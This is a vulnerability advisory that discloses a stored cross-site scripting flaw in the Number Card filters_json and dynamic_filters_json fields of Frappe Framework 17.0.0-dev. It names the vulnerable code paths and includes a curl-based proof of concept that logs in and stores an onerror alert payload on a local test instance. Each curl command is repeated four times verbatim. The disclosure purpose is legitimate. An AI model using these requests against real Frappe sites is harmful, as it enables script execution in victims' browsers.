Frappe Framework 17.0.0-dev - Stored XSS in Number Card filter fields rendering

Description

A Stored Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev due to improper neutralization of user-controlled input in the Number Card component. An authenticated attacker can store crafted HTML or JavaScript payloads in the filters_json or dynamic_filters_json fields of a Number Card.

When a user opens the affected card in Desk, client-side rendering logic parses these stored values and injects them into the page using jQuery HTML rendering functions without adequate escaping or sanitization, resulting in arbitrary JavaScript execution in the victim's browser.

Vulnerability

Case A: filters_json rendering path

1. Source: attacker-controlled args.filters_json passed to the whitelisted RPC create_number_card.

2. Persistence: server code performs doc.update(args) and doc.insert(ignore_permissions=True), storing attacker data in the Number Card document.

3. Sanitization gap: filters_json is a Code field, and _sanitize_content explicitly skips sanitization for Code fieldtype.

4. Sink: render_filters_table parses frm.doc.filters_json and interpolates filter[1], filter[2], filter[3] into HTML template literals:

   • <td>${filter[1]}</td>

   • <td>${filter[2] || ""}</td>

   • <td>${filter[3]}</td> then appends rows via jQuery (table.find("tbody").append(filter_row)).

5. Impact: stored payload executes in victim browser when the Number Card is opened.

Case B: dynamic_filters_json rendering path

1. Source: attacker-controlled args.dynamic_filters_json passed to the same whitelisted RPC create_number_card.

2. Persistence: same storage path (doc.update(args) + doc.insert(ignore_permissions=True)).

3. Sanitization gap: dynamic_filters_json is also a Code field and is not HTML-sanitized.

4. Sink: set_dynamic_filters_in_table parses frm.doc.dynamic_filters_json, builds filter_rows with:

   • <td>${filter[1]}</td>

   • <td><code>${filter[3] || ""}</code></td> then injects with jQuery .html(filter_rows).

5. Impact: stored payload executes when the Number Card is rendered by a victim.

Relevant code:

• frappe/frappe/desk/doctype/number_card/number_card.py:206-212

• frappe/frappe/desk/doctype/number_card/number_card.js:221

• frappe/frappe/desk/doctype/number_card/number_card.js:235-241

• frappe/frappe/desk/doctype/number_card/number_card.js:548-568

• frappe/frappe/desk/doctype/number_card/number_card.json:66-69

• frappe/frappe/desk/doctype/number_card/number_card.json:138-141

• frappe/frappe/model/base_document.py:1356-1360

• frappe/frappe/model/base_document.py:1386

PoC

Reproduction used in validation environment

1. Login and keep a session cookie:

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

2. Create a malicious Number Card using the whitelisted method:

Case A (filters_json):

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"MCP FiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9666)>\"]]","is_public":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"MCP FiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9666)>\"]]","is_public":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"MCP FiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9666)>\"]]","is_public":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"MCP FiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9666)>\"]]","is_public":1}'

Case B (dynamic_filters_json):

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"DynamicFiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","dynamic_filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9888)>\"]]","is_public":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"DynamicFiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","dynamic_filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9888)>\"]]","is_public":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"DynamicFiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","dynamic_filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9888)>\"]]","is_public":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  'http://localhost:18080/api/method/frappe.desk.doctype.number_card.number_card.create_number_card' \
  --data-urlencode 'args={"label":"DynamicFiltersJSON XSS PoC 1","type":"Document Type","document_type":"ToDo","function":"Count","dynamic_filters_json":"[[\"ToDo\",\"description\",\"=\",\"<img src=x onerror=alert(9888)>\"]]","is_public":1}'

3. Open created cards:

   • http://localhost:18080/desk/number-card/MCP%20FiltersJSON%20XSS%20PoC%201

   • http://localhost:18080/desk/number-card/DynamicFiltersJSON%20XSS%20PoC%201

Expected result:

• Browser executes alert(9666) for Case A.

• Browser executes alert(9888) for Case B.

Evidence of Exploitation

• Video of exploitation:

  

Our security policy

We have reserved the ID CVE-2026-50711 to refer to this issue from now on.

System Information

• Frappe Framework

• Version 17.0.0-dev

• Operating System: Any

References

• Github Repository: https://github.com/frappe/frappe

• Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.